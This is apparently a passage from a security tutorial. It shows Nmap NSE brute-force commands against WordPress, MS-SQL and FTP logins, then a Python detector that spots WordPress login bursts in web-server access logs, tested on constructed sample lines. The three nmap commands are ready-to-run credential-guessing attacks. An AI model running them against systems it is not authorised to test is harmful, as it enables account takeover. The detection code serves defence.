NSE is really fascinating – it contains scripts for everything you can imagine. See the next three examples of brute force attacks (BFA) against WordPress, MS-SQL, and FTP servers:
WordPress brute force attack:
nmap -sV --script http-wordpress-brute --script-args 'userdb=users.txt,passdb=passwds.txt,http-wordpress-brute.hostname=domain.com,http-wordpress-brute.threads=3,brute.firstonly=true' 192.168.1.105
Brute force attack against MS-SQL:
nmap -p 1433 --script ms-sql-brute --script-args userdb=customuser.txt,passdb=custompass.txt 192.168.1.105
FTP brute force attack:
nmap --script ftp-brute -p 21 192.168.1.105
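What the WordPress run above looks like from the target's side, as an added example that is not part of the original page: a Python detector that reads web-server access logs in Combined Log Format and flags source addresses sending bursts of POSTs to /wp-login.php (the login URI http-wordpress-brute uses by default), noting whether NSE's default User-Agent was seen. The log lines, source addresses, threshold and window are constructed assumptions, and the log is assumed to be in chronological order.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Substring of the default User-Agent NSE HTTP scripts send unless http.useragent is set.
NSE_UA = "Nmap Scripting Engine"
# Combined Log Format: ip - user [time] "METHOD path proto" status size "referer" "ua"
LINE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'\d{3} \S+ "[^"]*" "(?P<ua>[^"]*)"')

def detect_wp_bruteforce(lines, threshold=5, window=timedelta(seconds=10)):
    """Return {source_ip: {"peak": n, "nse_ua": bool}} for every IP that sent at
    least `threshold` POSTs to /wp-login.php inside one sliding `window`."""
    recent = defaultdict(deque)  # ip -> timestamps still inside the window
    peak = defaultdict(int)      # ip -> largest burst seen so far
    nse = defaultdict(bool)      # ip -> default NSE User-Agent observed
    for line in lines:
        m = LINE.match(line)
        if not m or m["method"] != "POST":
            continue
        if m["path"].split("?", 1)[0] != "/wp-login.php":
            continue
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        q = recent[m["ip"]]
        q.append(ts)
        while ts - q[0] > window:  # drop attempts that fell out of the window
            q.popleft()
        peak[m["ip"]] = max(peak[m["ip"]], len(q))
        nse[m["ip"]] |= NSE_UA in m["ua"]
    return {ip: {"peak": n, "nse_ua": nse[ip]}
            for ip, n in peak.items() if n >= threshold}

# Constructed sample: 192.168.1.50 guesses six times in three seconds,
# 192.168.1.77 is an ordinary user logging in once.
UA = "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
SAMPLE = [
    f'192.168.1.50 - - [12/Mar/2024:10:15:{s:02d} +0000] "POST /wp-login.php HTTP/1.1" 200 3120 "-" "{UA}"'
    for s in (1, 1, 2, 2, 3, 3)
] + [
    '192.168.1.77 - - [12/Mar/2024:10:16:40 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '192.168.1.77 - - [12/Mar/2024:10:16:41 +0000] "GET /wp-admin/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
]

if __name__ == "__main__":
    for ip, info in detect_wp_bruteforce(SAMPLE).items():
        print(ip, info)
```

The User-Agent flag is only a hint, since it can be overridden with the http.useragent script argument; the burst count is the signal that survives that change.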